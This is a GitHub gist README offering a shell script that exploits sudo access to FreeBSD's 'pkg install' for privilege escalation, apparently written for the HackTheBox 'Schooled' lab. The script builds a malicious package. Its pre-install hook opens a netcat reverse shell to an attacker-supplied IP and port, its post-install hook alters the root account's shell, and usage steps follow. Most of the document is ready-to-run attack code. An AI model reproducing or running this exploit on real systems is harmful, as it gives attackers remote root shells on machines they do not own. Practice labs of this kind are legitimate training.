Skip to content

Instantly share code, notes, and snippets.

@rishi23root

rishi23root/README.md

Last active August 7, 2021 00:21
Show Gist options
  • Save rishi23root/83dcb62b21ed30e3c2614c6ee2629e15 to your computer and use it in GitHub Desktop.
Save rishi23root/83dcb62b21ed30e3c2614c6ee2629e15 to your computer and use it in GitHub Desktop.
Download ZIP
Exploit for privilege escalation from "pkg" and "pkg install *"
Raw
README.md

Exploit for privilege escalation from "pkg" and "pkg install *"

# pkg install * | privilege escalation | by rishi23jain

### TAKES 2 ARGS IP AND PORT FOR REVERSE SHELL

baseDIR=/tmp/exploiter

# clear and make temp dir 
rm -fr $baseDIR
mkdir -p $baseDIR

# contains 3 files PRE_INSTALL, POST_INSTALL and MANIFEST

echo "Creating file 1"
cat << EOF > $baseDIR/+PRE_INSTALL 
## REVERSE SHELL FOR HACKER 
echo "sending root shell";
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $1 $2 >/tmp/f
EOF

echo "creating file 2"
cat << EOF > $baseDIR/+POST_INSTALL 
## MAKE sh EXECUTING AS ROOT ALWAYS
echo "making shell ROOT";
pw usermod -n root -s /bin/sh
EOF

echo "creating file 3"
cat << EOF >> $baseDIR/+MANIFEST
## SOME INFO OF PACKAGE CREATED
name: hacked
version: "1.0_0"
origin: "sysutils/mypackage"
comment: "hacker"
desc: "for just hacking"
maintainer: [email protected]
www: https://google.com
prefix: /
EOF

# To run the exploit 
pkg create -m $baseDIR/ -r $baseDIR/ -o .

To run this exploit.sh

  1. First make it executable chmod +x exploit.sh
  2. on target machine ./exploit.sh <hacker-ip> <port> for the reverse shell
  3. sudo pkg install -y --no-repo-update *.txz to run the exploit as package more info at https://gtfobins.github.io/gtfobins/pkg/
@rishi23root
Copy link
Author

very useful in https://app.hackthebox.eu/machines/Schooled

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment